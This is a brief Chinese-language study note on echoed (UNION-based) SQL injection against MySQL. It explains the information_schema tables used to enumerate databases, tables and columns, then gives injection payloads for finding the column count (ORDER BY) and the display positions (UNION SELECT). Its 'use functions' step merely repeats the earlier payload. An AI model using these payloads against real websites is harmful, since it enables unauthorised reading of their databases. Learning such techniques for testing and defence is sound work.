sql的有回显
在mysql 5版本之后,加入了information_schema库,显示了全部的数据库信息
information_schema.schemata 包含所有数据库的名
字段 | 解释 |
---|---|
schema_name | 数据库名 |
information_schema.tables 包含所有库的表名
字段 | 解释 |
---|---|
table_schema | 数据库名 |
table_name | 表名 |
information_schema.columns 包含所有的表的字段
字段 | 解释 |
---|---|
table_schema | 数据库名 |
table_name | 表名 |
column_name | 列名 |
判断字段数
?id=1’ ORDER BY 3#
判断显示位
?id=-1’ UNION SELECT 1,2,3#
利用函数获得信息
?id=-1’ UNION SELECT 1,2,3#
也可以将# 变为--+